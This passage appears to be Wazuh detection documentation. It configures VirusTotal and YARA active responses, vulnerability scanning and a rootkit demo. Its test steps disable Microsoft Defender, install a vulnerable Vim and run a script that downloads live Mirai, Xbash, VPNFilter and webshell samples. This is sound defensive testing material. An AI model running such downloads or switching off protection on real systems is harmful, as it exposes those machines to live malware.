  1. Search for the <syscheck> block in the Wazuh agent C:\Program Files (x86)\ossec-agent\ossec.conf file. Make sure that <disabled> is set to no. This enables the Wazuh FIM module to monitor for directory changes.

  2. Add an entry within the <syscheck> block to configure a directory to be monitored in near real-time. In this use case, you configure Wazuh to monitor the C:\Users\<USER_NAME>\Downloads directory. Replace the <USER_NAME> variable with the appropriate user name:

    <directories realtime="yes">C:\Users\<USER_NAME>\Downloads</directories>
    
  3. Download the Python executable installer from the official Python website.

  4. Run the Python installer once downloaded. Make sure to check the following boxes:

    • Install launcher for all users

    • Add Python 3.X to PATH (This places the interpreter in the execution path)

  5. Once Python completes the installation process, open an administrator PowerShell terminal and use pip to install PyInstaller:

    > pip install pyinstaller
    > pyinstaller --version
    

    You use PyInstaller here to convert the active response Python script into an executable application that can run on a Windows endpoint.

  6. Create an active response script remove-threat.py to remove a file from the Windows endpoint:

    Warning

    This script is a proof of concept (PoC). Review and validate it to ensure it meets the operational and security requirements of your environment.

    # Copyright (C) 2015-2025, Wazuh Inc.
    # All rights reserved.
    
    import os
    import sys
    import json
    import datetime
    import stat
    import tempfile
    import pathlib
    
    if os.name == 'nt':
        LOG_FILE = "C:\\Program Files (x86)\\ossec-agent\\active-response\\active-responses.log"
    else:
        LOG_FILE = "/var/ossec/logs/active-responses.log"
    
    ADD_COMMAND = 0
    DELETE_COMMAND = 1
    CONTINUE_COMMAND = 2
    ABORT_COMMAND = 3
    
    OS_SUCCESS = 0
    OS_INVALID = -1
    
    class message:
        def __init__(self):
            self.alert = ""
            self.command = 0
    
    def write_debug_file(ar_name, msg):
        with open(LOG_FILE, mode="a") as log_file:
            log_file.write(str(datetime.datetime.now().strftime('%Y/%m/%d %H:%M:%S')) + " " + ar_name + ": " + msg +"\n")
    
    def setup_and_check_message(argv):
        input_str = ""
        for line in sys.stdin:
            input_str = line
            break
    
        msg_obj = message()
        try:
            data = json.loads(input_str)
        except ValueError:
            write_debug_file(argv[0], 'Decoding JSON has failed, invalid input format')
            msg_obj.command = OS_INVALID
            return msg_obj
    
        msg_obj.alert = data
        command = data.get("command")
    
        if command == "add":
            msg_obj.command = ADD_COMMAND
        elif command == "delete":
            msg_obj.command = DELETE_COMMAND
        else:
            msg_obj.command = OS_INVALID
            write_debug_file(argv[0], 'Not valid command: ' + command)
    
        return msg_obj
    
    def send_keys_and_check_message(argv, keys):
        keys_msg = json.dumps({"version": 1,"origin":{"name": argv[0],"module":"active-response"},"command":"check_keys","parameters":{"keys":keys}})
        write_debug_file(argv[0], keys_msg)
    
        print(keys_msg)
        sys.stdout.flush()
    
        input_str = ""
        while True:
            line = sys.stdin.readline()
            if line:
                input_str = line
                break
    
        try:
            data = json.loads(input_str)
        except ValueError:
            write_debug_file(argv[0], 'Decoding JSON has failed, invalid input format')
            return OS_INVALID
    
        action = data.get("command")
        if action == "continue":
            return CONTINUE_COMMAND
        elif action == "abort":
            return ABORT_COMMAND
        else:
            write_debug_file(argv[0], "Invalid value of 'command'")
            return OS_INVALID
    
    def secure_delete_file(filepath_str, ar_name):
        filepath = pathlib.Path(filepath_str)
    
        # Reject NTFS alternate data streams
        if '::' in filepath_str:
            raise Exception(f"Refusing to delete ADS or NTFS stream: {filepath_str}")
    
        # Reject symbolic links and reparse points
        if os.path.islink(filepath):
            raise Exception(f"Refusing to delete symbolic link: {filepath}")
    
        attrs = os.lstat(filepath).st_file_attributes
        if attrs & stat.FILE_ATTRIBUTE_REPARSE_POINT:
            raise Exception(f"Refusing to delete reparse point: {filepath}")
    
        resolved_filepath = filepath.resolve()
    
        # Ensure it's a regular file
        if not resolved_filepath.is_file():
            raise Exception(f"Target is not a regular file: {resolved_filepath}")
    
        # Perform deletion
        os.remove(resolved_filepath)
    
    def main(argv):
        write_debug_file(argv[0], "Started")
        msg = setup_and_check_message(argv)
    
        if msg.command < 0:
            sys.exit(OS_INVALID)
    
        if msg.command == ADD_COMMAND:
            alert = msg.alert["parameters"]["alert"]
            keys = [alert["rule"]["id"]]
            action = send_keys_and_check_message(argv, keys)
    
            if action != CONTINUE_COMMAND:
                if action == ABORT_COMMAND:
                    write_debug_file(argv[0], "Aborted")
                    sys.exit(OS_SUCCESS)
                else:
                    write_debug_file(argv[0], "Invalid command")
                    sys.exit(OS_INVALID)
    
            try:
                file_path = alert["data"]["virustotal"]["source"]["file"]
                if os.path.exists(file_path):
                    secure_delete_file(file_path, argv[0])
                    write_debug_file(argv[0], json.dumps(msg.alert) + " Successfully removed threat")
                else:
                    write_debug_file(argv[0], f"File does not exist: {file_path}")
            except OSError:
                write_debug_file(argv[0], json.dumps(msg.alert) + " Error removing threat")
            except Exception as e:
                write_debug_file(argv[0], f"{json.dumps(msg.alert)}: Error removing threat: {str(e)}")
        else:
            write_debug_file(argv[0], "Invalid command")
    
        write_debug_file(argv[0], "Ended")
        sys.exit(OS_SUCCESS)
    
    if __name__ == "__main__":
        main(sys.argv)
    
  7. Convert the active response Python script remove-threat.py to a Windows executable. If PyInstaller is not already installed, install it with pip install pyinstaller. Then run the following PowerShell command as an administrator to create the executable:

    > pyinstaller -F \path_to_remove-threat.py
    

    Take note of the path where pyinstaller created remove-threat.exe.

  8. Move the executable file remove-threat.exe to the C:\Program Files (x86)\ossec-agent\active-response\bin directory.

  9. Restart the Wazuh agent to apply the changes. Run the following PowerShell command as an administrator:

    > Restart-Service -Name wazuh
    
Wazuh server

Perform the following steps on the Wazuh server to configure the VirusTotal integration. These steps also enable and trigger the active response script whenever a suspicious file is detected.

  1. Add the following configuration to the /var/ossec/etc/ossec.conf file on the Wazuh server to enable the VirusTotal integration. Replace <YOUR_VIRUS_TOTAL_API_KEY> with your VirusTotal API key. This triggers a VirusTotal query whenever any rule in the FIM syscheck group fires:

    <ossec_config>
      <integration>
        <name>virustotal</name>
        <api_key><YOUR_VIRUS_TOTAL_API_KEY></api_key> <!-- Replace with your VirusTotal API key -->
        <group>syscheck</group>
        <alert_format>json</alert_format>
      </integration>
    </ossec_config>
    

    Note

    The free VirusTotal API rate limits requests to four per minute. If you have a premium VirusTotal API key with a higher request quota, you can add more FIM rules and configure Wazuh to monitor additional directories besides C:\Users\<USER_NAME>\Downloads (see the example after these steps).

  2. Append the following blocks to the Wazuh server /var/ossec/etc/ossec.conf file. This enables Active Response and triggers the remove-threat.exe executable when the VirusTotal query returns positive matches for threats:

    <ossec_config>
      <command>
        <name>remove-threat</name>
        <executable>remove-threat.exe</executable>
        <timeout_allowed>no</timeout_allowed>
      </command>
    
      <active-response>
        <disabled>no</disabled>
        <command>remove-threat</command>
        <location>local</location>
        <rules_id>87105</rules_id>
      </active-response>
    </ossec_config>
    
  3. Add the following rules to the Wazuh server /var/ossec/etc/rules/local_rules.xml file to alert about the Active Response results.

    <group name="virustotal,">
      <rule id="100092" level="12">
          <if_sid>657</if_sid>
          <match>Successfully removed threat</match>
          <description>$(parameters.program) removed threat located at $(parameters.alert.data.virustotal.source.file)</description>
      </rule>
    
      <rule id="100093" level="12">
        <if_sid>657</if_sid>
        <match>Error removing threat</match>
        <description>Error removing threat located at $(parameters.alert.data.virustotal.source.file)</description>
      </rule>
    </group>
    
  4. Restart the Wazuh manager to apply the configuration changes:

    $ sudo systemctl restart wazuh-manager
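
As mentioned in the note of step 1, monitoring additional folders only requires extra <directories> entries inside the <syscheck> block of the Windows agent configuration file. A minimal sketch, where the Documents path is only an example:

    <syscheck>
      <directories realtime="yes">C:\Users\<USER_NAME>\Downloads</directories>
      <directories realtime="yes">C:\Users\<USER_NAME>\Documents</directories>
    </syscheck>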
    
Attack emulation
  1. Follow the next steps to temporarily turn off real-time Microsoft Defender antivirus protection in Windows Security:

    1. Click on the Start menu and type Windows Security to search for that app.

    2. Select the Windows Security app from results, go to Virus & threat protection, and under Virus & threat protection settings select Manage settings.

    3. Switch Real-time protection to Off.

  2. Download an EICAR test file to the C:\Users\<USER_NAME>\Downloads directory on the Windows endpoint.

    > Invoke-WebRequest -Uri https://secure.eicar.org/eicar.com.txt -OutFile eicar.txt
    > cp .\eicar.txt C:\Users\<USER_NAME>\Downloads
    

    This triggers a VirusTotal query and generates an alert. In addition, the active response script automatically removes the file.
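
    You can also check the agent's active response log on the Windows endpoint (typically C:\Program Files (x86)\ossec-agent\active-response\active-responses.log) for the debug messages written by the script:

    > Get-Content 'C:\Program Files (x86)\ossec-agent\active-response\active-responses.log' -Tail 10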

Visualize the alerts

You can visualize the alert data in the Wazuh dashboard. To do this, go to the Threat Hunting module and add the filters in the search bar to query the alerts.

  • Windows - rule.id: is one of 554,100092,553,87105

    Remove malware from Windows alert

Vulnerability detection

Wazuh uses the Vulnerability Detection module to identify vulnerabilities in applications and operating systems running on monitored endpoints.

This use case shows how Wazuh detects unpatched Common Vulnerabilities and Exposures (CVEs) in the monitored endpoint.

For more information on this capability, check the Vulnerability detection section of the Wazuh documentation.

Infrastructure

Endpoint: Red Hat Enterprise Linux 7

Description: The Wazuh Vulnerability Detection module scans this Linux endpoint for vulnerabilities in the operating system and installed applications.

Note

Vulnerabilities tagged with the description unimportant will not appear on the Wazuh dashboard. Visit the Wazuh CTI page for more information. The Compatibility matrix shows the operating systems officially supported by the Vulnerability Detection module.

Configuration

The Wazuh Vulnerability Detection module is enabled by default and generates alerts when new vulnerabilities are detected or when existing vulnerabilities are resolved through package updates, removal, or system upgrades.

Wazuh server

Perform the following steps on the Wazuh server to confirm that the Wazuh Vulnerability Detection module is enabled and properly configured.

  1. Open the Wazuh server configuration file /var/ossec/etc/ossec.conf and check the following settings.

    • Vulnerability detection is enabled:

      <vulnerability-detection>
         <enabled>yes</enabled>
         <index-status>yes</index-status>
         <feed-update-interval>60m</feed-update-interval>
      </vulnerability-detection>
      
    • The Wazuh indexer connection is properly configured.

      By default, the indexer settings have one host configured. It is set to 0.0.0.0 as shown below.

      <indexer>
        <enabled>yes</enabled>
        <hosts>
          <host>https://0.0.0.0:9200</host>
        </hosts>
        <ssl>
          <certificate_authorities>
            <ca>/etc/filebeat/certs/root-ca.pem</ca>
          </certificate_authorities>
          <certificate>/etc/filebeat/certs/filebeat.pem</certificate>
          <key>/etc/filebeat/certs/filebeat-key.pem</key>
        </ssl>
      </indexer>
      
      • Replace 0.0.0.0 with your Wazuh indexer node IP address or hostname. You can find this value in the Filebeat config file /etc/filebeat/filebeat.yml.

      • Ensure the Filebeat certificate and key name match the certificate files in /etc/filebeat/certs.

      If you are running a Wazuh indexer cluster infrastructure, add a <host> entry for each one of your nodes. For example, in a two-node configuration:

      <hosts>
        <host>https://10.0.0.1:9200</host>
        <host>https://10.0.0.2:9200</host>
      </hosts>
      

      The Wazuh server prioritizes reporting to the first Wazuh indexer node in the list and switches to the next node if the first one is unavailable.

  2. Restart the Wazuh manager if you made changes to the configuration:

    $ sudo systemctl restart wazuh-manager
    
Test the configuration

Note

The time it takes to detect vulnerabilities depends on the <interval> value in the Syscollector module, configured in the /var/ossec/etc/ossec.conf file on the Wazuh agent. For this test, we reduce the Syscollector module interval time from 1h to 10m. Refer to System inventory capability configuration for more information.
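
For reference, the Syscollector interval is defined in the <wodle name="syscollector"> block of the agent configuration. A minimal sketch with the reduced interval (your block may contain additional scan options):

    <wodle name="syscollector">
      <disabled>no</disabled>
      <interval>10m</interval>
      <packages>yes</packages>
    </wodle>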

  1. Install Vim version 2:7.4.629-8, which is known to be vulnerable, on the RHEL 7 endpoint (example commands follow this list). Wait approximately 10 minutes, or the duration set in your Syscollector <interval>, for a new scan to run and the vulnerability to be detected.

  2. Remove the Vim package to fix the vulnerability. Wait another 10 minutes for Syscollector to run a new scan and confirm that the vulnerability has been cleared.
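
    The following commands are one way to perform these two steps on the RHEL 7 endpoint. The package name and release suffix are assumptions and may differ in your repositories:

    $ sudo yum install -y vim-enhanced-7.4.629-8.el7_9    # step 1: install the vulnerable build
    $ sudo yum remove -y vim-enhanced                      # step 2: remove it to resolve the vulnerability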

Visualize the vulnerabilities

You can visualize the detected vulnerabilities on the Wazuh dashboard. To see a list of active vulnerabilities, perform the following on the Wazuh dashboard:

  • Go to Vulnerability Detection and select Inventory.

  • Click + Add filter. Then filter by package.name.

  • In the Operator field, select is.

  • Search and select vim in the Values field.

To see vulnerability alerts from the last system inventory scan, switch to the Events tab. Add filters in the search bar to query vulnerability alerts for Vim.

Note

Not all vulnerabilities added to or removed from the inventory generate alerts. This depends on the event source. See Alert generation for more details.

Upon installation of the vulnerable Vim package, the active vulnerability alerts can be seen on the Wazuh dashboard by changing the filter to data.vulnerability.package.name: vim AND data.vulnerability.status:Active

After removing the vulnerable package from the endpoint, to view the resolved vulnerability alerts, simply change the filter values to data.vulnerability.package.name: vim AND data.vulnerability.status:Solved

Detecting malware using YARA integration

You can use the YARA integration with Wazuh to scan files added or modified on an endpoint for malware. YARA is a tool to detect and classify malware artifacts.

In this use case, we demonstrate how to configure YARA with Wazuh to detect malware on Linux and Windows endpoints.

To learn more about this integration with Wazuh, see the How to integrate Wazuh with YARA section of the documentation.

Infrastructure

Endpoint: Ubuntu 22.04 / RHEL 9.0

Description: The YARA Active Response module scans new or modified files whenever the Wazuh FIM module triggers an alert.

Endpoint: Windows 11

Description: The YARA Active Response module scans new or modified files whenever the Wazuh FIM module triggers an alert.

Configuration for Linux
Linux endpoint

Perform the following steps to install YARA, and configure the Active Response and FIM modules.

  1. Download, compile and install YARA:

    Ubuntu

    $ sudo apt update
    $ sudo apt install -y make gcc autoconf libtool libssl-dev pkg-config jq
    $ sudo curl -LO https://github.com/VirusTotal/yara/archive/v4.5.5.tar.gz
    $ sudo tar -xvzf v4.5.5.tar.gz -C /usr/local/bin/ && rm -f v4.5.5.tar.gz
    $ cd /usr/local/bin/yara-4.5.5/
    $ sudo ./bootstrap.sh && sudo ./configure && sudo make && sudo make install && sudo make check
    

    RHEL

    $ sudo yum makecache
    $ sudo yum install epel-release
    $ sudo yum update
    $ sudo yum install -y make automake gcc autoconf libtool openssl-devel pkg-config jq
    $ sudo curl -LO https://github.com/VirusTotal/yara/archive/v4.5.5.tar.gz
    $ sudo tar -xvzf v4.5.5.tar.gz -C /usr/local/bin/ && rm -f v4.5.5.tar.gz
    $ cd /usr/local/bin/yara-4.5.5/
    $ sudo ./bootstrap.sh && sudo ./configure && sudo make && sudo make install && sudo make check
    
  2. Test that YARA is running properly:

    $ yara
    
    yara: wrong number of arguments
    Usage: yara [OPTION]... [NAMESPACE:]RULES_FILE... FILE | DIR | PID
    
    Try `--help` for more options
    

    If the error message below is displayed:

    /usr/local/bin/yara: error while loading shared libraries: libyara.so.9: cannot open shared object file: No such file or directory.
    

    This means that the loader cannot find the libyara library, which is usually located in /usr/local/lib. To solve this, add the /usr/local/lib path to the /etc/ld.so.conf loader configuration file:

    $ sudo su
    # echo "/usr/local/lib" >> /etc/ld.so.conf
    # ldconfig
    

    Switch back to the previous user.

  3. Download YARA detection rules:

    $ sudo mkdir -p /tmp/yara/rules
    $ sudo curl 'https://valhalla.nextron-systems.com/api/v1/get' \
    -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' \
    -H 'Accept-Language: en-US,en;q=0.5' \
    --compressed \
    -H 'Referer: https://valhalla.nextron-systems.com/' \
    -H 'Content-Type: application/x-www-form-urlencoded' \
    -H 'DNT: 1' -H 'Connection: keep-alive' -H 'Upgrade-Insecure-Requests: 1' \
    --data 'demo=demo&apikey=1111111111111111111111111111111111111111111111111111111111111111&format=text' \
    -o /tmp/yara/rules/yara_rules.yar
    
  4. Create a yara.sh script in the /var/ossec/active-response/bin/ directory. This is necessary for the Wazuh-YARA Active Response scans:

    #!/bin/bash
    # Wazuh - Yara active response
    # Copyright (C) 2015-2022, Wazuh Inc.
    #
    # This program is free software; you can redistribute it
    # and/or modify it under the terms of the GNU General Public
    # License (version 2) as published by the FSF - Free Software
    # Foundation.
    
    
    #------------------------- Gather parameters -------------------------#
    
    # Extra arguments
    read INPUT_JSON
    YARA_PATH=$(echo $INPUT_JSON | jq -r .parameters.extra_args[1])
    YARA_RULES=$(echo $INPUT_JSON | jq -r .parameters.extra_args[3])
    FILENAME=$(echo $INPUT_JSON | jq -r .parameters.alert.syscheck.path)
    
    # Set LOG_FILE path
    LOG_FILE="logs/active-responses.log"
    
    size=0
    actual_size=$(stat -c %s ${FILENAME})
    while [ ${size} -ne ${actual_size} ]; do
        sleep 1
        size=${actual_size}
        actual_size=$(stat -c %s ${FILENAME})
    done
    
    #----------------------- Analyze parameters -----------------------#
    
    if [[ ! $YARA_PATH ]] || [[ ! $YARA_RULES ]]
    then
        echo "wazuh-yara: ERROR - Yara active response error. Yara path and rules parameters are mandatory." >> ${LOG_FILE}
        exit 1
    fi
    
    #------------------------- Main workflow --------------------------#
    
    # Execute Yara scan on the specified filename
    yara_output="$("${YARA_PATH}"/yara -w -r "$YARA_RULES" "$FILENAME")"
    
    if [[ $yara_output != "" ]]
    then
        # Iterate every detected rule and append it to the LOG_FILE
        while read -r line; do
            echo "wazuh-yara: INFO - Scan result: $line" >> ${LOG_FILE}
        done <<< "$yara_output"
    fi
    
    exit 0;
    
  5. Change yara.sh file owner to root:wazuh and file permissions to 0750:

    $ sudo chown root:wazuh /var/ossec/active-response/bin/yara.sh
    $ sudo chmod 750 /var/ossec/active-response/bin/yara.sh
    
  6. Add the following within the <syscheck> block of the Wazuh agent /var/ossec/etc/ossec.conf configuration file to monitor the /tmp/yara/malware directory:

    <directories realtime="yes">/tmp/yara/malware</directories>
    
  7. Restart the Wazuh agent to apply the configuration changes:

    $ sudo systemctl restart wazuh-agent
    
Wazuh server

Perform the following steps to configure Wazuh to alert for file changes in the endpoint monitored directory. The steps also configure an active response script to trigger whenever a suspicious file is detected.

  1. Add the following rules to the /var/ossec/etc/rules/local_rules.xml file. The rules detect FIM events in the monitored directory. They also alert when the YARA integration finds malware. You can modify the rules to detect events from other directories:

    <group name="syscheck,">
      <rule id="100300" level="7">
        <if_sid>550</if_sid>
        <field name="file">/tmp/yara/malware/</field>
        <description>File modified in /tmp/yara/malware/ directory.</description>
      </rule>
      <rule id="100301" level="7">
        <if_sid>554</if_sid>
        <field name="file">/tmp/yara/malware/</field>
        <description>File added to /tmp/yara/malware/ directory.</description>
      </rule>
    </group>
    
    <group name="yara,">
      <rule id="108000" level="0">
        <decoded_as>yara_decoder</decoded_as>
        <description>Yara grouping rule</description>
      </rule>
      <rule id="108001" level="12">
        <if_sid>108000</if_sid>
        <match>wazuh-yara: INFO - Scan result: </match>
        <description>File "$(yara_scanned_file)" is a positive match. Yara rule: $(yara_rule)</description>
      </rule>
    </group>
    
  2. Add the following decoders to the Wazuh server /var/ossec/etc/decoders/local_decoder.xml file. These decoders extract the information from YARA scan results (a sample scan result line is shown after this list):

    <decoder name="yara_decoder">
      <prematch>wazuh-yara:</prematch>
    </decoder>
    
    <decoder name="yara_decoder1">
      <parent>yara_decoder</parent>
      <regex>wazuh-yara: (\S+) - Scan result: (\S+) (\S+)</regex>
      <order>log_type, yara_rule, yara_scanned_file</order>
    </decoder>
    
  3. Add the following configuration to the Wazuh server /var/ossec/etc/ossec.conf configuration file. This configures the Active Response module to trigger after rules 100300 and 100301 fire:

    <ossec_config>
      <command>
        <name>yara_linux</name>
        <executable>yara.sh</executable>
        <extra_args>-yara_path /usr/local/bin -yara_rules /tmp/yara/rules/yara_rules.yar</extra_args>
        <timeout_allowed>no</timeout_allowed>
      </command>
    
      <active-response>
        <disabled>no</disabled>
        <command>yara_linux</command>
        <location>local</location>
        <rules_id>100300,100301</rules_id>
      </active-response>
    </ossec_config>
    
  4. Restart the Wazuh manager to apply the configuration changes:

    $ sudo systemctl restart wazuh-manager
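
As a reference for the decoders in step 2, a scan result line written by yara.sh to the active responses log looks similar to the following (the rule name and file path are illustrative). The decoder extracts INFO as log_type, the YARA rule name as yara_rule, and the scanned file path as yara_scanned_file:

    wazuh-yara: INFO - Scan result: Mirai_Botnet_Malware /tmp/yara/malware/mirai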
    
Attack emulation
  1. Create the directory /tmp/yara/malware:

    $ sudo mkdir /tmp/yara/malware
    
  2. Create the script /tmp/yara/malware/malware_downloader.sh on the monitored endpoint to download malware samples:

    #!/bin/bash
    # Wazuh - Malware Downloader for test purposes
    # Copyright (C) 2015-2022, Wazuh Inc.
    #
    # This program is free software; you can redistribute it
    # and/or modify it under the terms of the GNU General Public
    # License (version 2) as published by the FSF - Free Software
    # Foundation.
    
    function fetch_sample(){
    
      curl -s -XGET "$1" -o "$2"
    
    }
    
    echo "WARNING: Downloading Malware samples, please use this script with  caution."
    read -p "  Do you want to continue? (y/n)" -n 1 -r ANSWER
    echo
    
    if [[ $ANSWER =~ ^[Yy]$ ]]
    then
        echo
        # Mirai
        echo "# Mirai: https://en.wikipedia.org/wiki/Mirai_(malware)"
        echo "Downloading malware sample..."
        fetch_sample "https://raw.githubusercontent.com/wazuh/wazuh-documentation/refs/heads/5.0/resources/samples/mirai" "/tmp/yara/malware/mirai" && echo "Done!" || echo "Error while downloading."
        echo
    
        # Xbash
        echo "# Xbash: https://unit42.paloaltonetworks.com/unit42-xbash-combines-botnet-ransomware-coinmining-worm-targets-linux-windows/"
        echo "Downloading malware sample..."
        fetch_sample "https://raw.githubusercontent.com/wazuh/wazuh-documentation/refs/heads/5.0/resources/samples/xbash" "/tmp/yara/malware/xbash" && echo "Done!" || echo "Error while downloading."
        echo
    
        # VPNFilter
        echo "# VPNFilter: https://news.sophos.com/en-us/2018/05/24/vpnfilter-botnet-a-sophoslabs-analysis/"
        echo "Downloading malware sample..."
        fetch_sample "https://raw.githubusercontent.com/wazuh/wazuh-documentation/refs/heads/5.0/resources/samples/vpn_filter" "/tmp/yara/malware/vpn_filter" && echo "Done!" || echo "Error while downloading."
        echo
    
        # Webshell
        echo "# WebShell: https://github.com/SecWiki/WebShell-2/blob/master/Php/Worse%20Linux%20Shell.php"
        echo "Downloading malware sample..."
        fetch_sample "https://raw.githubusercontent.com/wazuh/wazuh-documentation/refs/heads/5.0/resources/samples/webshell" "/tmp/yara/malware/webshell" && echo "Done!" || echo "Error while downloading."
        echo
    fi
    
  3. Run the malware_downloader.sh script to download malware samples to the /tmp/yara/malware directory:

    $ sudo bash /tmp/yara/malware/malware_downloader.sh
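
    Optionally, before checking the dashboard, confirm on the endpoint that the active response ran by reading the log file that yara.sh writes to:

    $ sudo tail /var/ossec/logs/active-responses.log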
    
Visualize the alerts

You can visualize the alert data in the Wazuh dashboard. To do this, go to the Threat Hunting module and add the filters in the search bar to query the alerts.

  • rule.groups:yara

Configuration for Windows
Windows endpoint
Configure Python and YARA

Perform the following steps to install Python, YARA, and download YARA rules.

  1. Download the Python executable installer from the official Python website.

  2. Run the Python installer once downloaded and make sure to check the following boxes:

    • Install launcher for all users

    • Add Python 3.X to PATH. This places the interpreter in the execution path.

  3. Download and install the latest Visual C++ Redistributable package.

  4. Open PowerShell with administrator privileges to download and extract YARA:

    > Invoke-WebRequest -Uri https://github.com/VirusTotal/yara/releases/download/v4.5.5/yara-4.5.5-2368-win64.zip -OutFile yara-v4.5.5-win64.zip
    > Expand-Archive yara-v4.5.5-win64.zip; Remove-Item yara-v4.5.5-win64.zip
    
  5. Create a directory called C:\Program Files (x86)\ossec-agent\active-response\bin\yara\ and copy the YARA executable into it:

    > mkdir 'C:\Program Files (x86)\ossec-agent\active-response\bin\yara\'
    > cp .\yara-v4.5.5-win64\yara64.exe 'C:\Program Files (x86)\ossec-agent\active-response\bin\yara\'
    
  6. Install the valhallaAPI module:

    > pip install valhallaAPI
    
  7. Copy the following script and save it as download_yara_rules.py:

    from valhallaAPI.valhalla import ValhallaAPI
    
    v = ValhallaAPI(api_key="1111111111111111111111111111111111111111111111111111111111111111")
    response = v.get_rules_text()
    
    with open('yara_rules.yar', 'w') as fh:
        fh.write(response)
    
  8. Run the following commands to download the rules and place them in the C:\Program Files (x86)\ossec-agent\active-response\bin\yara\rules\ directory:

    > python.exe download_yara_rules.py
    > mkdir 'C:\Program Files (x86)\ossec-agent\active-response\bin\yara\rules\'
    > cp yara_rules.yar 'C:\Program Files (x86)\ossec-agent\active-response\bin\yara\rules\'
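
    Optionally, verify that the YARA binary runs and that the downloaded rules compile by scanning an arbitrary file, for example:

    > & 'C:\Program Files (x86)\ossec-agent\active-response\bin\yara\yara64.exe' --version
    > & 'C:\Program Files (x86)\ossec-agent\active-response\bin\yara\yara64.exe' 'C:\Program Files (x86)\ossec-agent\active-response\bin\yara\rules\yara_rules.yar' C:\Windows\System32\notepad.exe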
    
Configure Active Response and FIM

Perform the steps below to configure the Wazuh FIM and an active response script for the detection of malicious files on the endpoint.

  1. Create the yara.bat script in the C:\Program Files (x86)\ossec-agent\active-response\bin\ directory. This is necessary for the Wazuh-YARA Active Response scans:

    @echo off
    
    setlocal enableDelayedExpansion
    
    reg Query "HKLM\Hardware\Description\System\CentralProcessor\0" | find /i "x86" > NUL && SET OS=32BIT || SET OS=64BIT
    
    
    if %OS%==32BIT (
        SET log_file_path="%programfiles%\ossec-agent\active-response\active-responses.log"
    )
    
    if %OS%==64BIT (
        SET log_file_path="%programfiles(x86)%\ossec-agent\active-response\active-responses.log"
    )
    
    set input=
    for /f "delims=" %%a in ('PowerShell -command "$logInput = Read-Host; Write-Output $logInput"') do (
        set input=%%a
    )
    
    
    set json_file_path="C:\Program Files (x86)\ossec-agent\active-response\stdin.txt"
    set syscheck_file_path=
    echo %input% > %json_file_path%
    
    for /F "tokens=* USEBACKQ" %%F in (`Powershell -Nop -C "(Get-Content 'C:\Program Files (x86)\ossec-agent\active-response\stdin.txt'|ConvertFrom-Json).parameters.alert.syscheck.path"`) do (
    set syscheck_file_path=%%F
    )
    
    del /f %json_file_path%
    set yara_exe_path="C:\Program Files (x86)\ossec-agent\active-response\bin\yara\yara64.exe"
    set yara_rules_path="C:\Program Files (x86)\ossec-agent\active-response\bin\yara\rules\yara_rules.yar"
    echo %syscheck_file_path% >> %log_file_path%
    for /f "delims=" %%a in ('powershell -command "& \"%yara_exe_path%\" \"%yara_rules_path%\" \"%syscheck_file_path%\""') do (
        echo wazuh-yara: INFO - Scan result: %%a >> %log_file_path%
    )
    
    exit /b
    
  2. Add the C:\Users\<USER_NAME>\Downloads directory for monitoring within the <syscheck> block in the Wazuh agent configuration file C:\Program Files (x86)\ossec-agent\ossec.conf. Replace <USER_NAME> with the username of the endpoint:

    <directories realtime="yes">C:\Users\<USER_NAME>\Downloads</directories>
    
  3. Restart the Wazuh agent to apply the configuration changes:

    > Restart-Service -Name wazuh
    
Wazuh server

Perform the following steps on the Wazuh server. This allows alerting for changes in the endpoint monitored directory and configuring an active response script to trigger whenever it detects a suspicious file.

  1. Add the following decoders to the Wazuh server /var/ossec/etc/decoders/local_decoder.xml file. This allows extracting the information from YARA scan results:

    <decoder name="yara_decoder">
        <prematch>wazuh-yara:</prematch>
    </decoder>
    
    <decoder name="yara_decoder1">
        <parent>yara_decoder</parent>
        <regex>wazuh-yara: (\S+) - Scan result: (\S+) (\S+)</regex>
        <order>log_type, yara_rule, yara_scanned_file</order>
    </decoder>
    
  2. Add the following rules to the Wazuh server /var/ossec/etc/rules/local_rules.xml file. The rules detect FIM events in the monitored directory. They also alert when malware is found by the YARA integration. Replace <USER_NAME> with the username of the endpoint.

    <group name="syscheck,">
      <rule id="100303" level="7">
        <if_sid>550</if_sid>
        <field name="file">C:\\Users\\<USER_NAME>\\Downloads</field>
        <description>File modified in C:\Users\<USER_NAME>\Downloads directory.</description>
      </rule>
      <rule id="100304" level="7">
        <if_sid>554</if_sid>
        <field name="file">C:\\Users\\<USER_NAME>\\Downloads</field>
        <description>File added to C:\Users\<USER_NAME>\Downloads directory.</description>
      </rule>
    </group>
    
    <group name="yara,">
      <rule id="108000" level="0">
        <decoded_as>yara_decoder</decoded_as>
        <description>Yara grouping rule</description>
      </rule>
    
      <rule id="108001" level="12">
        <if_sid>108000</if_sid>
        <match>wazuh-yara: INFO - Scan result: </match>
        <description>File "$(yara_scanned_file)" is a positive match. Yara rule: $(yara_rule)</description>
      </rule>
    </group>
    
  3. Add the following configuration to the Wazuh server /var/ossec/etc/ossec.conf file:

    <ossec_config>
      <command>
        <name>yara_windows</name>
        <executable>yara.bat</executable>
        <timeout_allowed>no</timeout_allowed>
      </command>
    
      <active-response>
        <disabled>no</disabled>
        <command>yara_windows</command>
        <location>local</location>
        <rules_id>100303,100304</rules_id>
      </active-response>
    </ossec_config>
    
  4. Restart the Wazuh manager to apply the configuration changes:

    $ sudo systemctl restart wazuh-manager
    
Attack emulation

Note

For testing purposes, we download the EICAR anti-malware test file as shown below. We recommend testing in a sandbox, not in a production environment.

Download a malware sample on the monitored Windows endpoint:

  1. Turn off Microsoft Virus and threat protection.

  2. Download the EICAR zip file:

    > Invoke-WebRequest -Uri https://secure.eicar.org/eicar_com.zip -OutFile eicar.zip
    
  3. Unzip it:

    > Expand-Archive .\eicar.zip
    
  4. Copy the EICAR file to the monitored directory. Replace <USER_NAME> with the username of the endpoint.

    > cp .\eicar\eicar.com C:\Users\<USER_NAME>\Downloads
    
Visualize the alerts

You can visualize the alert data in the Wazuh dashboard. To do this, go to the Threat Hunting module and add the filters in the search bar to query the alerts.

  • rule.groups:yara

Detecting hidden processes

In this use case, we show how Wazuh detects processes hidden by a rootkit on a Linux endpoint. You deploy a kernel-mode rootkit on an Ubuntu endpoint for the demonstration.

This rootkit hides itself from the kernel module list. It also hides selected processes from the ps utility. However, Wazuh detects it using the setsid(), getpid(), and kill() system calls (a conceptual illustration follows).
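
Conceptually, a hidden process can be found by probing every possible PID with system calls and comparing the results with what the ps utility reports. The following Python snippet is a simplified illustration of that idea, not the actual rootcheck implementation:

    import os
    import subprocess

    # PIDs that the ps utility can see
    visible = {int(p) for p in subprocess.check_output(["ps", "-eo", "pid="], text=True).split()}

    # Probe the default PID range (pid_max may be larger on some systems)
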